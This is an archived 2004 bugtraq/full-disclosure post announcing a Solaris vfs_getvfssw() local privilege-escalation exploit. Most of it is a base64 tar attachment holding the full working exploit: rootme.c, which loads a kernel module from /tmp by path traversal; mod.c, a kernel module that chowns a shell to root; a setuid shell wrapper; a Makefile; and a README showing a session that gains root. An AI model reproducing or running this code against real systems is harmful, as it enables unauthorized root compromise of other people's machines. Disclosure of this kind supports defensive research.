[34444] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post
Solaris vfs_getvfssw() local kernel exploit

daemon@ATHENA.MIT.EDU (Sam)
Wed Apr 7 18:11:58 2004

Message-ID: <20040407084629.23600.qmail@mail.securityfocus.com>
Date: Wed, 7 Apr 2004 16:28:42 +0800
From: "Sam" <Sam@0x557.org>
To: "full-disclosure" <full-disclosure@lists.netsys.com>
Cc: "bugtraq" <bugtraq@securityfocus.com>
Mime-Version: 1.0
Content-Type: multipart/mixed;
	boundary="=====001_Dragon206700712435_====="

--=====001_Dragon206700712435_=====
Content-Type: text/plain;
	charset="gb2312"
Content-Transfer-Encoding: 7bit

full-disclosureHey, everyone.

i m comming :D, it's a lame local root exploit for Solaris.
exploit Solaris vfs_getvfssw() Loadable Kernel Module Path vulns, which found
by Dave Aitel, you can find on this link. :P 
http://www.immunitysec.com/downloads/solaris_kernel_vfs.sxw.pdf 

Cheers,

Sam Sam#0x557.org
				
--=====001_Dragon206700712435_=====
Content-Type: application/octet-stream;
	name="rootme.tar"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="rootme.tar"

Li9yb290bWUvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAwNDA3NTUAMDAwMDE1
MQAwMDAwMDAxADAwMDAwMDAwMDAwADEwMDM0NzM0MTczADAwMTI0NzcANQAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB1c3RhcgAwMHNhbQAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAb3RoZXIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwMDAwMjEwADAwMDAw
MDUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAu
L3Jvb3RtZS9SRUFETUUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMDEwMDY0NAAwMDAwMTUx
ADAwMDAwMDEAMDAwMDAwMDE1NjMAMTAwMzQ3MzQwMzMAMDAxMzM1NAAwAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHVzdGFyADAwc2FtAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAABvdGhlcgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAwMDAyMTAAMDAwMDAw
NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGJh
c2gtMi4wMyQgdW5hbWUgLWEKU3VuT1MgUzIyMCA1LjggR2VuZXJpY18xMDg1MjgtMDUgc3VuNHUg
c3BhcmMgU1VOVyxVbHRyYS01XzEwCmJhc2gtMi4wMyQgaWQKdWlkPTEwNShzYW0pIGdpZD0xKG90
aGVyKQpiYXNoLTIuMDMkIGxzIC1hbEYgL3RtcC9zaAovdG1wL3NoOiBObyBzdWNoIGZpbGUgb3Ig
ZGlyZWN0b3J5CmJhc2gtMi4wMyQgLi9yb290bWUKCiMgaWQKdWlkPTAocm9vdCkgZ2lkPTEob3Ro
ZXIpCiMgcm0gL3RtcAo6IE5vIHN1Y2ggZmlsZSBvciBkaXJlY3RvcnkKIyBybSAtZnIgL3RtcC9z
cGFyY3Y5CiMgbW9kaW5mbyB8IGdyZXAgcm9vdAojClszXSsgIFN0b3BwZWQgICAgICAgICAgICAg
ICAgIC4vcm9vdG1lCmJhc2gtMi4wMyQgbHMgLWFsRiAvdG1wL3NoCi1yd3NyLXhyLXggICAxIHJv
b3QgICAgIHJvb3QgICAgICAgIDYzNDQgQXByICA3IDE2OjA5IC90bXAvc2gqCmJhc2gtMi4wMyQg
L3RtcC9zaAojIGlkCnVpZD0wKHJvb3QpIGdpZD0xKG90aGVyKQojIG1vZGluZm8gfCBncmVwIHJv
b3QKIDE0IDEwMWQ5ZDhiICAgMTk1MiAgIDEgICAxICByb290bmV4IChzdW40dSByb290IG5leHVz
IDEuOTApCjEwOCAxMDE0Nzc4ZiAgICA0NjcgICAtICAgMSAgbW9kIChyb290IG1lKQojIG1vZHVu
bG9hZCAtaSAxMDgKIyB3CiAgNDoxMXBtICB1cCAyMCBkYXkocyksICA0OjQyLCAgMiB1c2Vycywg
IGxvYWQgYXZlcmFnZTogMC4yNSwgMC4yMSwgMC4xNQpVc2VyICAgICB0dHkgICAgICAgICAgIGxv
Z2luQCAgaWRsZSAgIEpDUFUgICBQQ1BVICB3aGF0CnNhbSAgICAgIHB0cy8xOCAgICAgICAxMjow
NXBtICAgICAyICAgICA1NCAgICAgMTQgIGJhc2gKc2FtICAgICAgcHRzLzE5ICAgICAgICAyOjQ3
cG0gICAgICAgICAxOjExICAgICAgNSAgdwoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuL3Jv
b3RtZS9NYWtlZmlsZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMDEwMDY0NAAwMDAwMTUxADAw
MDAwMDEAMDAwMDAwMDAzMTEAMTAwMzQ3MzMzNDUAMDAxNDEyNwAwAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHVzdGFyADAwc2FtAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAABvdGhlcgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAwMDAyMTAAMDAwMDAwNQAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEtDQyA9
IGdjYyAtZyAtbTY0IC1EX0tFUk5FTCAtRFNWUjQgLURTT0wyIC1jCkxEID0gbGQKQ0MgPSBnY2Mg
LW8KYWxsOgltb2Qgcm9vdG1lCm1vZC5vOgltb2QuYwoJJHtLQ0N9ICQ8CnJvb3RtZToJcm9vdG1l
LmMKCSR7Q0N9IHJvb3RtZSAkPAptb2Q6CW1vZC5vCgkkKExEKSAtbyAkQCAtciAkXgpjbGVhbjoK
CXJtIC1mIG1vZCByb290bWUgKn4gKi5vCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALi9yb290
bWUvcm9vdG1lLmMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAxMDA2NDQAMDAwMDE1MQAwMDAw
MDAxADAwMDAwMDAyMjE0ADEwMDM0NzM0MTMzADAwMTQxNDAAMAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB1c3RhcgAwMHNhbQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAb3RoZXIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwMDAwMjEwADAwMDAwMDUAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvKiByb290
bWUuYyAtIFNvbGFyaXMgdmZzX2dldHZmc3N3KCkgTG9hZGFibGUgS2VybmVsIE1vZHVsZSBQYXRo
IFRyYXZlcnNhbCBFeHBsb2l0CiAqIAogKiBDb3B5cmlnaHQgKGMpIFNTVCAyMDA0IEFsbCByaWdo
dHMgcmVzZXJ2ZWQuCiAqCiAqIFB1YmxpYyB2ZXJzaW9uCiAqCiAqIGNvZGUgYnkgU2FtIGFuZCAg
MjAwNC8wNC8wNwogKiAgICAgIDxTYW1AdmVudXN0ZWNoLmNvbS5jbj4KICogICAgICAgICAgICAg
ICAgICAgICA8U2FtQDB4NTU3Lm9yZz4KICoKICogYnVnIGZpbmQgYnkgRGF2ZSBBaXRlbAogKiBo
dHRwOi8vd3d3LmltbXVuaXR5c2VjLmNvbS9kb3dubG9hZHMvc29sYXJpc19rZXJuZWxfdmZzLnN4
dy5wZGYKICoKICoKICogc29tZSB0aGFua3MvZ3JlZXRzIHRvOgogKiBzc3QgbWVtYmVycywgWGZv
Y3VzIEd1eXMsIG15IGdmIDpJCiAqIGFuZCBldmVyeW9uZSBlbHNlIHdobydzIEtOT1cgU1NUIDtQ
CiAqIGh0dHA6Ly8weDU1Ny5vcmcKICovCgojaW5jbHVkZSA8c3RkaW8uaD4KI2luY2x1ZGUgPHN5
cy9mc3R5cC5oPgojaW5jbHVkZSA8c3lzL2ZzaWQuaD4KI2luY2x1ZGUgPHN5cy90eXBlcy5oPgoj
aW5jbHVkZSA8dW5pc3RkLmg+CgppbnQgZG9fcm9vdF9tZSAoKQp7CglpZiAobWtkaXIoIi90bXAv
c3BhcmN2OSIsIDA3NzcpIDwgMCkgewoJCXBlcnJvciAoIm1rZGlyIik7CgkJcmV0dXJuIC0xOwoJ
fQoJCglzeXN0ZW0gKCJjcCAuL21vZCAvdG1wL3NwYXJjdjkvIik7CgkKCXN5c2ZzIChHRVRGU0lO
RCwgIi4uLy4uL3RtcC9tb2QiKTsKCQoJcmV0dXJuIDA7Cn0KCmludCBtYWtlX3NoZWxsICgpCnsK
CXN5c3RlbSAoImdjYyAtbyBzaCBzaC5jO2NwIC4vc2ggL3RtcC9zaDtjaG1vZCA0NzU1IC90bXAv
c2giKTsKCXJldHVybiAwOwp9CgkKCmludCBtYWluKCkKewoJcGlkX3QJY2hpbGQ7CgkKCW1ha2Vf
c2hlbGwgKCk7CgljaGlsZCA9IGZvcmsgKCk7CglpZiAoY2hpbGQgPT0gLTEpCgkJcHJpbnRmICgi
VW5hYmxlIHRvIGZvcmtcbiIpOwoKCWlmIChjaGlsZCA9PSAwKQoJCWRvX3Jvb3RfbWUoKTsKCQoJ
c3lzdGVtKCIvdXNyL2Jpbi9ybSAtcmYgL3RtcC9zcGFyY3Y5Iik7CglwcmludGYgKCJwcmVzcyBh
bnlrZXkgIik7CQoJZ2V0Y2hhciAoKTsKCWV4ZWNsICgiL3RtcC9zaCIsICIvdG1wL3NoIiwgMCk7
CgkKCXJldHVybiAwOwp9CgoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuL3Jvb3RtZS9z
aC5jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMDEwMDY0NAAwMDAwMDAwADAwMDAwMDEA
MDAwMDAwMDAyMDEAMTAwMzQ3MzEyMTEAMDAxMzQyNQAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAHVzdGFyADAwcm9vdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AABvdGhlcgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAwMDAyMTAAMDAwMDAwNQAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8qIHJlYWxseSBz
aGl0ID8gaGVoZQogKgogKi8KI2luY2x1ZGUgPHN0ZGlvLmg+CgppbnQgbWFpbiAoKQp7CglzZXRy
ZXVpZCAoMCwgMCk7CglleGVjbCAoIi9iaW4vc2giLCAiL2Jpbi9zaCIsIDApOwoJcmV0dXJuIDA7
Cn0KCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALi9yb290bWUvbW9k
LmMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAxMDA2NDQAMDAwMDE1MQAwMDAwMDAxADAw
MDAwMDA0MzAwADEwMDM0NzMxMTA2ADAwMTM0MDUAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAB1c3RhcgAwMHNhbQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
b3RoZXIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwMDAwMjEwADAwMDAwMDUAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvKiBsYW1lciBTb2xh
cmlzIEtlcm5lbCBNb2R1bGVzIHRvIGNoYW5nZSAvdG1wL3NoJ3MgdWlkL2dpZAogKgogKiBDb3B5
cmlnaHQgKGMpIFNTVCAyMDA0IEFsbCByaWdodHMgcmVzZXJ2ZWQuCiAqCiAqIGNvZGUgYnkgU2Ft
IGFuZCAgMjAwNC8wNC8wNwogKiAgICAgIDxTYW1AdmVudXN0ZWNoLmNvbS5jbj4KICogICAgICAg
ICAgICAgPFNhbUAweDU1Ny5vcmc+CiAqCiAqIGh0dHA6Ly8weDU1Ny5vcmcKICovCiNpbmNsdWRl
IDxzeXMvZGRpLmg+CiNpbmNsdWRlIDxzeXMvc3VuZGRpLmg+CiNpbmNsdWRlIDxzeXMvdHlwZXMu
aD4KI2luY2x1ZGUgPHN5cy9tb2RjdGwuaD4KI2luY2x1ZGUgPHN5cy9jb3B5b3BzLmg+CiNpbmNs
dWRlIDxzeXMvc3VuZGRpLmg+CiNpbmNsdWRlIDxzeXMvZXJybm8uaD4KI2luY2x1ZGUgPHN5cy92
ZnMuaD4KCmV4dGVybiBzdHJ1Y3QgbW9kX29wcyBtb2RfbWlzY29wczsKCnN0YXRpYyBzdHJ1Y3Qg
bW9kbG1pc2MgbW9kbG1pc2MgPQp7CiAgICAgICAgJm1vZF9taXNjb3BzLAogICAgICAgICJyb290
IG1lIgp9OwoKc3RhdGljIHN0cnVjdCBtb2RsaW5rYWdlIG1vZGxpbmthZ2UgPQp7CiAgICAgICAg
TU9EUkVWXzEsCiAgICAgICAgeyZtb2RsbWlzYyxOVUxMfQp9OwoKLyogbmFtZXNldGF0dHIgKCkg
YW5kIGNob3duICgpIHJpcHBlZCBmcm9tIGdzdS50YXIKICogYnkgamVycnloagogKi8Kc3RhdGlj
IGludApuYW1lc2V0YXR0cihjaGFyICpmbmFtZXAsIGVudW0gc3ltZm9sbG93IGZvbGxvd2xpbmss
IHZhdHRyX3QgKnZhcCwgaW50IGZsYWdzKQp7CiAgICAgICAgdm5vZGVfdCAqdnA7CiAgICAgICAg
aW50IGVycm9yID0gMDsKCiAgICAgICAgaWYgKGVycm9yID0gbG9va3VwbmFtZShmbmFtZXAsIFVJ
T19TWVNTUEFDRSwgZm9sbG93bGluaywgTlVMTFZQUCwgJnZwKSkgewogICAgICAgICAgICAgICAg
Y21uX2VycihDRV9DT05ULCJHZXQgU3U6IDEuZXJybm8gPSAlZFxuIixlcnJvcik7CiAgICAgICAg
ICAgICAgICByZXR1cm4gZXJyb3I7CiAgICAgICAgfQogICAgICAgIGlmICh2cC0+dl92ZnNwLT52
ZnNfZmxhZyAmIFZGU19SRE9OTFkpIHsKICAgICAgICAgICAgICAgIGNtbl9lcnIoQ0VfQ09OVCwi
R2V0IFN1OiAyLmVycm5vID0gJWRcbiIsZXJyb3IpOwogICAgICAgICAgICAgICAgZXJyb3IgPSBF
Uk9GUzsKICAgICAgICB9IGVsc2UgaWYgKGVycm9yID0gVk9QX1NFVEFUVFIodnAsIHZhcCwgZmxh
Z3MsIENSRUQoKS8qKiBrY3JlZCAqKi8pKSB7CiAgICAgICAgICAgICAgICBjbW5fZXJyKENFX0NP
TlQsIkdldCBTdTogMy5lcnJubyA9ICVkXG4iLGVycm9yKTsKICAgICAgICB9CiAgICAgICAgVk5f
UkVMRSh2cCk7CiAgICAgICAgcmV0dXJuIChlcnJvcik7Cn0KCnN0YXRpYyBpbnQKY2hvd24oY2hh
ciAqZm5hbWUsIHVpZF90IHVpZCwgZ2lkX3QgZ2lkKQp7CiAgICAgICAgc3RydWN0IHZhdHRyIHZh
dHRyOwoKICAgICAgICBpZiAodWlkIDwgLTEgfHwgdWlkID4gTUFYVUlEIHx8IGdpZCA8IC0xIHx8
IGdpZCA+IE1BWFVJRCkKICAgICAgICAgICAgICAgIHJldHVybiBFSU5WQUw7CiAgICAgICAgdmF0
dHIudmFfdWlkID0gdWlkOwogICAgICAgIHZhdHRyLnZhX2dpZCA9IGdpZDsKICAgICAgICB2YXR0
ci52YV9tYXNrID0gMDsKICAgICAgICBpZiAodmF0dHIudmFfdWlkICE9IC0xKQogICAgICAgICAg
ICAgICAgdmF0dHIudmFfbWFzayB8PSBBVF9VSUQ7CiAgICAgICAgaWYgKHZhdHRyLnZhX2dpZCAh
PSAtMSkKICAgICAgICAgICAgICAgIHZhdHRyLnZhX21hc2sgfD0gQVRfR0lEOwogICAgICAgIHJl
dHVybiAobmFtZXNldGF0dHIoZm5hbWUsIEZPTExPVywgJnZhdHRyLCAwKSk7Cn0KCmludCBfaW5p
dCh2b2lkKQp7CiAgICAgICAgaW50IGk7CiAgICAgICAgaSA9IG1vZF9pbnN0YWxsKCZtb2RsaW5r
YWdlKTsKICAgICAgICBpZihpID09IDApIHsKICAgICAgICAgICAgICAgIGNob3duICgiL3RtcC9z
aCIsIDAsIDApOwoKICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgY21uX2VycihDRV9O
T1RFLCJmaWxlZFxuIik7CiAgICAgICAgfQoKICAgICAgICByZXR1cm4gaTsKfQoKaW50IF9pbmZv
KHN0cnVjdCBtb2RpbmZvICptb2RpbmZvcCkKewogICAgICAgIHJldHVybiAobW9kX2luZm8gKCZt
b2RsaW5rYWdlLCBtb2RpbmZvcCkpOwp9CgppbnQgX2Zpbmkodm9pZCkKewogICAgICAgIGludCBp
OwogICAgICAgIGkgPSBtb2RfcmVtb3ZlKCZtb2RsaW5rYWdlKTsKCiAgICAgICAgcmV0dXJuIGk7
Cn0KCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

--=====001_Dragon206700712435_=====--

home	help	back	first	fref	pref	prev	next	nref	lref	last	post
[34444] in bugtraq

Solaris vfs_getvfssw() local kernel exploit

daemon@ATHENA.MIT.EDU (Sam)Wed Apr 7 18:11:58 2004

daemon@ATHENA.MIT.EDU (Sam)
Wed Apr 7 18:11:58 2004
